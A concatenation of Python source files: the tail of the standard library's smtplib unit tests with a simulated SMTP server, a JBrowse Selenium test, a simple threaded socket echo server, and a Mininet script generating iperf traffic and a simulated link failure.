self.serv_evt.wait()
self.output.flush()
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: the_rescuers@Rescue-Aid-Society.com$',
re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('John', 'Dinsdale'):
to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.
MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageResent(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'
] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
smtp.send_message(m)
time.sleep(0.01)
smtp.quit()
self.client_evt.set()
self.serv_evt.wait()
self.output.flush()
del m['Bcc']
del m['Resent-Bcc']
m['X-Peer'] = socket.gethostbyname('localhost')
mexpect = '%s%s\n%s' % (MSG_BEGIN, m.as_string(), MSG_END)
self.assertEqual(self.output.getvalue(), mexpect)
debugout = smtpd.DEBUGSTREAM.getvalue()
sender = re.compile('^sender: holy@grail.net$', re.MULTILINE)
self.assertRegex(debugout, sender)
for addr in ('my_mom@great.cooker.com', 'Jeff', 'doe@losthope.net'):
to_addr = re.compile("^recips: .*'{}'.*$".format(addr), re.
MULTILINE)
self.assertRegex(debugout, to_addr)
def testSendMessageMultipleResentRaises(self):
m = email.mime.text.MIMEText('A test message')
m['From'] = 'foo@bar.com'
m['To'] = 'John'
m['CC'] = 'Sally, Fred'
m['Bcc'
] = 'John Root <root@localhost>, "Dinsdale" <warped@silly.walks.com>'
m['Resent-Date'] = 'Thu, 1 Jan 1970 17:42:00 +0000'
m['Resent-From'] = 'holy@grail.net'
m['Resent-To'] = 'Martha <my_mom@great.cooker.com>, Jeff'
m['Resent-Bcc'] = 'doe@losthope.net'
m['Resent-Date'] = 'Thu, 2 Jan 1970 17:42:00 +0000'
m['Resent-To'] = 'holy@grail.net'
m['Resent-From'] = 'Martha <my_mom@great.cooker.com>, Jeff'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
with self.assertRaises(ValueError):
smtp.send_message(m)
smtp.close()
class NonConnectingTests(unittest.TestCase):
def testNotConnected(self):
smtp = smtplib.SMTP()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.ehlo)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, 'test msg'
)
def testNonnumericPort(self):
self.assertRaises(OSError, smtplib.SMTP, 'localhost', 'bogus')
self.assertRaises(OSError, smtplib.SMTP, 'localhost:bogus')
@unittest.skipUnless(threading, 'Threading required for this test.')
class BadHELOServerTests(unittest.TestCase):
def setUp(self):
smtplib.socket = mock_socket
mock_socket.reply_with(b'199 no hello for you!')
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.port = 25
def tearDown(self):
smtplib.socket = socket
sys.stdout = self.old_stdout
def testFailingHELO(self):
self.assertRaises(smtplib.SMTPConnectError, smtplib.SMTP, HOST,
self.port, 'localhost', 3)
@unittest.skipUnless(threading, 'Threading required for this test.')
class TooLongLineTests(unittest.TestCase):
respdata = b'250 OK' + b'.' * smtplib._MAXLINE * 2 + b'\n'
def setUp(self):
self.old_stdout = sys.stdout
self.output = io.StringIO()
sys.stdout = self.output
self.evt = threading.Event()
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.settimeout(15)
self.port = support.bind_port(self.sock)
servargs = self.evt, self.respdata, self.sock
threading.Thread(target=server, args=servargs).start()
self.evt.wait()
self.evt.clear()
def tearDown(self):
self.evt.wait()
sys.stdout = self.old_stdout
def testLineTooLong(self):
self.assertRaises(smtplib.SMTPResponseException, smtplib.SMTP, HOST,
self.port, 'localhost', 3)
sim_users = {'Mr.A@somewhere.com': 'John A', 'Ms.B@xn--fo-fka.com':
'Sally B', 'Mrs.C@somewhereesle.com': 'Ruth C'}
sim_auth = 'Mr.A@somewhere.com', 'somepassword'
sim_cram_md5_challenge = (
'PENCeUxFREJoU0NnbmhNWitOMjNGNndAZWx3b29kLmlubm9zb2Z0LmNvbT4=')
sim_lists = {'list-1': ['Mr.A@somewhere.com', 'Mrs.C@somewhereesle.com'],
'list-2': ['Ms.B@xn--fo-fka.com']}
class ResponseException(Exception):
pass
class SimSMTPChannel(smtpd.SMTPChannel):
quit_response = None
mail_response = None
rcpt_response = None
data_response = None
rcpt_count = 0
rset_count = 0
disconnect = 0
AUTH = 99
authenticated_user = None
def __init__(self, extra_features, *args, **kw):
self._extrafeatures = ''.join(['250-{0}\r\n'.format(x) for x in
extra_features])
super(SimSMTPChannel, self).__init__(*args, **kw)
def found_terminator(self):
if self.smtp_state == self.AUTH:
line = self._emptystring.join(self.received_lines)
print('Data:', repr(line), file=smtpd.DEBUGSTREAM)
self.received_lines = []
try:
self.auth_object(line)
except ResponseException as e:
self.smtp_state = self.COMMAND
self.push('%s %s' % (e.smtp_code, e.smtp_error))
return
super().found_terminator()
def smtp_AUTH(self, arg):
if not self.seen_greeting:
self.push('503 Error: send EHLO first')
return
if not self.extended_smtp or 'AUTH' not in self._extrafeatures:
self.push('500 Error: command "AUTH" not recognized')
return
if self.authenticated_user is not None:
self.push('503 Bad sequence of commands: already authenticated')
return
args = arg.split()
if len(args) not in [1, 2]:
self.push('501 Syntax: AUTH <mechanism> [initial-response]')
return
auth_object_name = '_auth_%s' % args[0].lower().replace('-', '_')
try:
self.auth_object = getattr(self, auth_object_name)
except AttributeError:
self.push(
'504 Command parameter not implemented: unsupported authentication mechanism {!r}'
.format(auth_object_name))
return
self.smtp_state = self.AUTH
self.auth_object(args[1] if len(args) == 2 else None)
def _authenticated(self, user, valid):
if valid:
self.authenticated_user = user
self.push('235 Authentication Succeeded')
else:
self.push('535 Authentication credentials invalid')
self.smtp_state = self.COMMAND
def _decode_base64(self, string):
return base64.decodebytes(string.encode('ascii')).decode('utf-8')
def _auth_plain(self, arg=None):
if arg is None:
self.push('334 ')
else:
logpass = self._decode_base64(arg)
try:
*_, user, password = logpass.split('\x00')
except ValueError as e:
self.push(
'535 Splitting response {!r} into user and password failed: {}'
.format(logpass, e))
return
self._authenticated(user, password == sim_auth[1])
def _auth_login(self, arg=None):
if arg is None:
self.push('334 VXNlcm5hbWU6')
elif not hasattr(self, '_auth_login_user'):
self._auth_login_user = self._decode_base64(arg)
self.push('334 UGFzc3dvcmQ6')
else:
password = self._decode_base64(arg)
self._authenticated(self._auth_login_user, password == sim_auth[1])
del self._auth_login_user
def _auth_cram_md5(self, arg=None):
if arg is None:
self.push('334 {}'.format(sim_cram_md5_challenge))
else:
logpass = self._decode_base64(arg)
try:
user, hashed_pass = logpass.split()
except ValueError as e:
self.push(
'535 Splitting response {!r} into user and passwordfailed: {}'
.format(logpass, e))
return False
valid_hashed_pass = hmac.HMAC(sim_auth[1].encode('ascii'), self
._decode_base64(sim_cram_md5_challenge).encode('ascii'), 'md5'
).hexdigest()
self._authenticated(user, hashed_pass == valid_hashed_pass)
def smtp_EHLO(self, arg):
resp = (
'250-testhost\r\n250-EXPN\r\n250-SIZE 20000000\r\n250-STARTTLS\r\n250-DELIVERBY\r\n'
)
resp = resp + self._extrafeatures + '250 HELP'
self.push(resp)
self.seen_greeting = arg
self.extended_smtp = True
def smtp_VRFY(self, arg):
if arg in sim_users:
self.push('250 %s %s' % (sim_users[arg], smtplib.quoteaddr(arg)))
else:
self.push('550 No such user: %s' % arg)
def smtp_EXPN(self, arg):
list_name = arg.lower()
if list_name in sim_lists:
user_list = sim_lists[list_name]
for n, user_email in enumerate(user_list):
quoted_addr = smtplib.quoteaddr(user_email)
if n < len(user_list) - 1:
self.push('250-%s %s' % (sim_users[user_email],
quoted_addr))
else:
self.push('250 %s %s' % (sim_users[user_email],
quoted_addr))
else:
self.push('550 No access for you!')
def smtp_QUIT(self, arg):
if self.quit_response is None:
super(SimSMTPChannel, self).smtp_QUIT(arg)
else:
self.push(self.quit_response)
self.close_when_done()
def smtp_MAIL(self, arg):
if self.mail_response is None:
super().smtp_MAIL(arg)
else:
self.push(self.mail_response)
if self.disconnect:
self.close_when_done()
def smtp_RCPT(self, arg):
if self.rcpt_response is None:
super().smtp_RCPT(arg)
return
self.rcpt_count += 1
self.push(self.rcpt_response[self.rcpt_count - 1])
def smtp_RSET(self, arg):
self.rset_count += 1
super().smtp_RSET(arg)
def smtp_DATA(self, arg):
if self.data_response is None:
super().smtp_DATA(arg)
else:
self.push(self.data_response)
def handle_error(self):
raise
class SimSMTPServer(smtpd.SMTPServer):
channel_class = SimSMTPChannel
def __init__(self, *args, **kw):
self._extra_features = []
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(self._extra_features, self,
conn, addr, decode_data=self._decode_data)
def process_message(self, peer, mailfrom, rcpttos, data):
pass
def add_feature(self, feature):
self._extra_features.append(feature)
def handle_error(self):
raise
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
self.serv = SimSMTPServer((HOST, 0), ('nowhere', -1), decode_data=True)
self.port = self.serv.socket.getsockname()[1]
serv_args = self.serv, self.serv_evt, self.client_evt
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
self.client_evt.set()
self.serv_evt.wait()
self.thread.join()
def testBasic(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.quit()
def testEHLO(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
self.assertEqual(smtp.esmtp_features, {})
expected_features = {'expn': '', 'size': '20000000', 'starttls': '',
'deliverby': '', 'help': ''}
smtp.ehlo()
self.assertEqual(smtp.esmtp_features, expected_features)
for k in expected_features:
self.assertTrue(smtp.has_extn(k))
self.assertFalse(smtp.has_extn('unsupported-feature'))
smtp.quit()
def testVRFY(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
for addr_spec, name in sim_users.items():
expected_known = 250, bytes('%s %s' % (name, smtplib.quoteaddr(
addr_spec)), 'ascii')
self.assertEqual(smtp.vrfy(addr_spec), expected_known)
u = 'nobody@nowhere.com'
expected_unknown = 550, ('No such user: %s' % u).encode('ascii')
self.assertEqual(smtp.vrfy(u), expected_unknown)
smtp.quit()
def testEXPN(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
for listname, members in sim_lists.items():
users = []
for m in members:
users.append('%s %s' % (sim_users[m], smtplib.quoteaddr(m)))
expected_known = 250, bytes('\n'.join(users), 'ascii')
self.assertEqual(smtp.expn(listname), expected_known)
u = 'PSU-Members-List'
expected_unknown = 550, b'No access for you!'
self.assertEqual(smtp.expn(u), expected_unknown)
smtp.quit()
def testAUTH_PLAIN(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_LOGIN(self):
self.serv.add_feature('AUTH LOGIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_CRAM_MD5(self):
self.serv.add_feature('AUTH CRAM-MD5')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def testAUTH_multiple(self):
self.serv.add_feature('AUTH BOGUS PLAIN LOGIN CRAM-MD5')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
resp = smtp.login(sim_auth[0], sim_auth[1])
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_auth_function(self):
supported = {'CRAM-MD5', 'PLAIN', 'LOGIN'}
for mechanism in supported:
self.serv.add_feature('AUTH {}'.format(mechanism))
for mechanism in supported:
with self.subTest(mechanism=mechanism):
smtp = smtplib.SMTP(HOST, self.port, local_hostname=
'localhost', timeout=15)
smtp.ehlo('foo')
smtp.user, smtp.password = sim_auth[0], sim_auth[1]
method = 'auth_' + mechanism.lower().replace('-', '_')
resp = smtp.auth(mechanism, getattr(smtp, method))
self.assertEqual(resp, (235, b'Authentication Succeeded'))
smtp.close()
def test_quit_resets_greeting(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
code, message = smtp.ehlo()
self.assertEqual(code, 250)
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
self.assertNotIn('size', smtp.esmtp_features)
smtp.connect(HOST, self.port)
self.assertNotIn('size', smtp.esmtp_features)
smtp.ehlo_or_helo_if_needed()
self.assertIn('size', smtp.esmtp_features)
smtp.quit()
def test_with_statement(self):
with smtplib.SMTP(HOST, self.port) as smtp:
code, message = smtp.noop()
self.assertEqual(code, 250)
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.close()
self.assertRaises(smtplib.SMTPServerDisconnected, smtp.send, b'foo')
def test_with_statement_QUIT_failure(self):
with self.assertRaises(smtplib.SMTPResponseException) as error:
with smtplib.SMTP(HOST, self.port) as smtp:
smtp.noop()
self.serv._SMTPchannel.quit_response = '421 QUIT FAILED'
self.assertEqual(error.exception.smtp_code, 421)
self.assertEqual(error.exception.smtp_error, b'QUIT FAILED')
def test__rest_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '451 Requested action aborted'
self.serv._SMTPchannel.disconnect = True
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
def test_421_from_mail_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.noop()
self.serv._SMTPchannel.mail_response = '421 closing connection'
with self.assertRaises(smtplib.SMTPSenderRefused):
smtp.sendmail('John', 'Sally', 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
def test_421_from_rcpt_cmd(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.noop()
self.serv._SMTPchannel.rcpt_response = ['250 accepted', '421 closing']
with self.assertRaises(smtplib.SMTPRecipientsRefused) as r:
smtp.sendmail('John', ['Sally', 'Frank', 'George'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rset_count, 0)
self.assertDictEqual(r.exception.args[0], {'Frank': (421, b'closing')})
def test_421_from_data_cmd(self):
class MySimSMTPChannel(SimSMTPChannel):
def found_terminator(self):
if self.smtp_state == self.DATA:
self.push('421 closing')
else:
super().found_terminator()
self.serv.channel_class = MySimSMTPChannel
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.noop()
with self.assertRaises(smtplib.SMTPDataError):
smtp.sendmail('John@foo.org', ['Sally@foo.org'], 'test message')
self.assertIsNone(smtp.sock)
self.assertEqual(self.serv._SMTPchannel.rcpt_count, 0)
def test_smtputf8_NotSupportedError_if_no_server_support(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertFalse(smtp.has_extn('smtputf8'))
self.assertRaises(smtplib.SMTPNotSupportedError, smtp.sendmail,
'John', 'Sally', '', mail_options=['BODY=8BITMIME', 'SMTPUTF8'])
self.assertRaises(smtplib.SMTPNotSupportedError, smtp.mail, 'John',
options=['BODY=8BITMIME', 'SMTPUTF8'])
def test_send_unicode_without_SMTPUTF8(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(UnicodeEncodeError, smtp.sendmail, 'Alice', 'Böb', ''
)
self.assertRaises(UnicodeEncodeError, smtp.mail, 'Älice')
class SimSMTPUTF8Server(SimSMTPServer):
def __init__(self, *args, **kw):
self._extra_features = ['SMTPUTF8', '8BITMIME']
smtpd.SMTPServer.__init__(self, *args, **kw)
def handle_accepted(self, conn, addr):
self._SMTPchannel = self.channel_class(self._extra_features, self,
conn, addr, decode_data=self._decode_data, enable_SMTPUTF8=self
.enable_SMTPUTF8)
def process_message(self, peer, mailfrom, rcpttos, data, mail_options=
None, rcpt_options=None):
self.last_peer = peer
self.last_mailfrom = mailfrom
self.last_rcpttos = rcpttos
self.last_message = data
self.last_mail_options = mail_options
self.last_rcpt_options = rcpt_options
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPUTF8SimTests(unittest.TestCase):
maxDiff = None
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
self.serv = SimSMTPUTF8Server((HOST, 0), ('nowhere', -1),
decode_data=False, enable_SMTPUTF8=True)
self.port = self.serv.socket.getsockname()[1]
serv_args = self.serv, self.serv_evt, self.client_evt
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
self.client_evt.set()
self.serv_evt.wait()
self.thread.join()
def test_test_server_supports_extensions(self):
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertTrue(smtp.does_esmtp)
self.assertTrue(smtp.has_extn('smtputf8'))
def test_send_unicode_with_SMTPUTF8_via_sendmail(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
smtp.sendmail('Jőhn', 'Sálly', m, mail_options=['BODY=8BITMIME',
'SMTPUTF8'])
self.assertEqual(self.serv.last_mailfrom, 'Jőhn')
self.assertEqual(self.serv.last_rcpttos, ['Sálly'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_unicode_with_SMTPUTF8_via_low_level_API(self):
m = '¡a test message containing unicode!'.encode('utf-8')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
smtp.ehlo()
self.assertEqual(smtp.mail('Jő', options=['BODY=8BITMIME',
'SMTPUTF8']), (250, b'OK'))
self.assertEqual(smtp.rcpt('János'), (250, b'OK'))
self.assertEqual(smtp.data(m), (250, b'OK'))
self.assertEqual(self.serv.last_mailfrom, 'Jő')
self.assertEqual(self.serv.last_rcpttos, ['János'])
self.assertEqual(self.serv.last_message, m)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_uses_smtputf8_if_addrs_non_ascii(self):
msg = EmailMessage()
msg['From'] = 'Páolo <főo@bar.com>'
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink ὠ9'
msg.set_content('oh là là, know what I mean, know what I mean?\n\n')
expected = textwrap.dedent(
""" From: Páolo <főo@bar.com>
To: Dinsdale
Subject: Nudge nudge, wink, wink ὠ9
Content-Type: text/plain; charset="utf-8"
Content-Transfer-Encoding: 8bit
MIME-Version: 1.0
oh là là, know what I mean, know what I mean?
"""
)
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
self.assertEqual(smtp.send_message(msg), {})
self.assertEqual(self.serv.last_mailfrom, 'főo@bar.com')
self.assertEqual(self.serv.last_rcpttos, ['Dinsdale'])
self.assertEqual(self.serv.last_message.decode(), expected)
self.assertIn('BODY=8BITMIME', self.serv.last_mail_options)
self.assertIn('SMTPUTF8', self.serv.last_mail_options)
self.assertEqual(self.serv.last_rcpt_options, [])
def test_send_message_error_on_non_ascii_addrs_if_no_smtputf8(self):
msg = EmailMessage()
msg['From'] = 'Páolo <főo@bar.com>'
msg['To'] = 'Dinsdale'
msg['Subject'] = 'Nudge nudge, wink, wink ὠ9'
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=3)
self.addCleanup(smtp.close)
self.assertRaises(smtplib.SMTPNotSupportedError, smtp.send_message(msg)
)
EXPECTED_RESPONSE = encode_base64(b'\x00psu\x00doesnotexist', eol='')
class SimSMTPAUTHInitialResponseChannel(SimSMTPChannel):
def smtp_AUTH(self, arg):
args = arg.split()
if args[0].lower() == 'plain':
if len(args) == 2:
if args[1] == EXPECTED_RESPONSE:
self.push('235 Ok')
return
self.push('571 Bad authentication')
class SimSMTPAUTHInitialResponseServer(SimSMTPServer):
channel_class = SimSMTPAUTHInitialResponseChannel
@unittest.skipUnless(threading, 'Threading required for this test.')
class SMTPAUTHInitialResponseSimTests(unittest.TestCase):
def setUp(self):
self.real_getfqdn = socket.getfqdn
socket.getfqdn = mock_socket.getfqdn
self.serv_evt = threading.Event()
self.client_evt = threading.Event()
self.serv = SimSMTPAUTHInitialResponseServer((HOST, 0), ('nowhere',
-1), decode_data=True)
self.port = self.serv.socket.getsockname()[1]
serv_args = self.serv, self.serv_evt, self.client_evt
self.thread = threading.Thread(target=debugging_server, args=serv_args)
self.thread.start()
self.serv_evt.wait()
self.serv_evt.clear()
def tearDown(self):
socket.getfqdn = self.real_getfqdn
self.client_evt.set()
self.serv_evt.wait()
self.thread.join()
def testAUTH_PLAIN_initial_response_login(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.login('psu', 'doesnotexist')
smtp.close()
def testAUTH_PLAIN_initial_response_auth(self):
self.serv.add_feature('AUTH PLAIN')
smtp = smtplib.SMTP(HOST, self.port, local_hostname='localhost',
timeout=15)
smtp.user = 'psu'
smtp.password = 'doesnotexist'
code, response = smtp.auth('plain', smtp.auth_plain)
smtp.close()
self.assertEqual(code, 235)
@support.reap_threads
def test_main(verbose=None):
support.run_unittest(BadHELOServerTests, DebuggingServerTests,
GeneralTests, NonConnectingTests, SMTPAUTHInitialResponseSimTests,
SMTPSimTests, TooLongLineTests)
if __name__ == '__main__':
test_main()
|
volvox_REST_names_test.py
|
import threading
import unittest
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.common.keys import Keys
import name_server
from jbrowse_selenium import JBrowseTest
class VolvoxRestTest( JBrowseTest ):
data_dir = 'tests/data/names_REST&tracks=Genes,CDS'
def setUp( self ):
# Does not bother formatting, assumes it's been done through ./setup
# The volvox_biodb_test.py test can be used to test formatting
t = threading.Thread(target=name_server.start_server, name='Backend')
t.daemon = True
t.start()
super( VolvoxRestTest, self ).setUp()
def test_volvox( self ):
# select "ctgA from the dropdown
self.select_refseq( 'ctgA' )
# check a good browser title
assert "ctgA" in self.browser.title, "browser title is actually %s" % self.browser.title
self.assert_no_js_errors()
# test scrolling, make sure we get no js errors
self.scroll()
# test sequence track display
self.scroll_around()
# test autocompletion
self.autocomplete()
self.assert_no_js_errors()
def scroll_around( self ):
self.do_typed_query( '0..80' )
self.do_typed_query( '1..20000')
self.do_typed_query( 'ctgA:19961..20047')
def autocomplete( self ):
self._do_typed_query_and_wait("App", 2)
self._do_typed_query_and_wait("EDE", 1)
loc = self.browser.title
self.browser.find_element_by_id("location").send_keys( Keys.RETURN )
self.waits_for_scroll(loc)
self._do_typed_query_and_wait("Apple1", 1)
loc = self.browser.title
self.browser.find_element_by_id("location").send_keys( Keys.RETURN )
self.waits_for_scroll(loc)
# Do a search and wait for a specific number of results
def _do_typed_query_and_wait( self, text, num_of_results ):
qbox = self.browser.find_element_by_id("location")
qbox.clear()
qbox.send_keys( text )
WebDriverWait(self, 5).until(lambda self: self.is_right_num_of_entries (num_of_results))
# Compares number of returned results against expected results
def is_right_num_of_entries( self, num ):
return len(self.browser.find_elements_by_css_selector("#location_popup>*"))-2 == num
class VolvoxBiodbTest( VolvoxRestTest, unittest.TestCase ):
pass
if __name__ == '__main__':
import unittest
unittest.main()
|
network.py
|
import socket
import threading
class Receiver:
def __init__(self, options, summary):
self.options = options
self.summary = summary
self.runable = True
self.socket = socket.socket(socket.AF_INET, options.protocol)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.socket.bind((None, options.port))
def listen(self):
self.socket.listen(3)
while self.runable:
client, address = self.socket.accept()
client.settimeout(60)
threading.Thread(
target = self.receive, args = (client,address)
).start()
self.socket.close()
def receive(self, client, address):
size = 1024
while True:
try:
data = client.recv(size)
if data:
client.send("ACK")
else:
raise error('Client disconnected')
except:
client.close()
return False
class Sender:
def __init__(self, options, summary):
self.options = options
self.summary = summary
self.runable = True
# some example code ofund on the web -------------------------------------------
class ThreadedServer(object):
def __init__(self, host, port):
self.host = host
self.port = port
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.sock.bind((self.host, self.port))
def listen(self):
self.sock.listen(5)
while True:
client, address = self.sock.accept()
client.settimeout(60)
threading.Thread(
target = self.listenToClient, args = (client,address)
).start()
def listenToClient(self, client, address):
size = 1024
while True:
try:
data = client.recv(size)
if data:
# Set the response to echo back the recieved data
response = data
client.send(response)
else:
raise error('Client disconnected')
except:
client.close()
return False
if __name__ == "__main__":
while True:
port_num = input("Port? ")
try:
port_num = int(port_num)
break
except ValueError:
pass
ThreadedServer('',port_num).listen()
|
py-mininet.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Nov 7 10:26:46 2019
@author: mep53
"""
from mininet.net import Mininet
from mininet.link import TCLink
from mininet.node import OVSController
from mininet.node import CPULimitedHost, Host, Node
from mininet_rest import MininetRest
from mininet.topo import LinearTopo
from mininet.topo import SingleSwitchTopo
from mininet.topolib import TreeTopo
from functools import partial
from mininet.net import Mininet
from mininet.node import RemoteController
from mininet.node import OVSSwitch
from mininet.cli import CLI
from mininet.log import setLogLevel, info
import logging
import time
import threading
import sys
import subprocess
from datetime import datetime
#LOG = logging.getLogger(os.path.basename(__file__))
#LOG = logging.getLogger(__name__)
setLogLevel('info')
def thread_launch(net):
mininet_rest = MininetRest(net)
mininet_rest.run(host='0.0.0.0', port=9081)
def thread_traffic(net,host_src,host_target_ip, bandw):
time.sleep(20)
info("About to trigger traffic")
# net.hosts[host_src].sendCmd("iperf -u -t 6000 -c " + host_target_ip + " -b 80M")
net.hosts[host_src].sendCmd("iperf -u -t 90 -c " + host_target_ip + " -b " + bandw )
info("Triggered Iperf "+ str(host_src) +" -> "+host_target_ip)
def thread_failure(net):
info("Wait for failure")
#time.sleep(240)
time.sleep(10)
info("Failure to trigger")
#switch.sendCmd("ifconfig s1-eth0 down")
#net.switches[4].cmd("ifconfig s5-eth1 down")
#net.switches[4].cmd("ifconfig s4-eth2 down")
info("Failure triggered\n")
#time.sleep(20)
#net.hosts[7].cmd("iperf -u -t 580 -c 10.0.0.2 -b 500M ") #150
info("new traffic triggered\n")
# net.switches[4].cmd("ifconfig s4-eth3 down")
def thread_console(net):
#net.hosts[8].sendCmd("iperf -u -t 600 -c 10.0.0.1 -b 500000000")
CLI(net)
def thread_t1(net):
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 28M ")
#info("triggered traffic 1\n")
#net.hosts[9].cmd("iperf -u -t 40 -c 10.0.0.1 -b 42M ")
#info("triggered traffic 2\n")
#net.hosts[9].cmd("iperf -u -t 20 -c 10.0.0.1 -b 130M ")
#info("triggered traffic 3\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 70M ")
#info("triggered traffic 4\n")
#net.hosts[9].cmd("iperf -u -t 60 -c 10.0.0.1 -b 500M ")
#info("triggered traffic 5\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 30M ")
#info("triggered traffic 6\n")
#net.hosts[9].cmd("iperf -u -t 30 -c 10.0.0.1 -b 200M ")
#info("triggered traffic 7\n")
info("[%s] h10 to h1 : starting traffic 1\n", datetime.now())
net.hosts[9].cmd("iperf -u -t 160 -c 10.0.0.1 -b 300M ")
info("[%s] h10 to h1 : ended traffic 1, starting traffic 2\n",datetime.now())
# time.sleep(65)
net.hosts[9].cmd("iperf -u -t 360 -c 10.0.0.1 -b 800M ")
info("[%s] h10 to h1 : ended traffic 2\n",datetime.now())
def thread_t2(net):
info("h6 to h2 : starting traffic 1\n")
#
net.hosts[6].cmd("iperf -u -t 240 -c 10.0.0.2 -b 500M ") #150
info("[%s] h7 to h2 : ended traffic 1, starting failure\n",datetime.now())
net.switches[4].cmd("ifconfig s4-eth2 down")
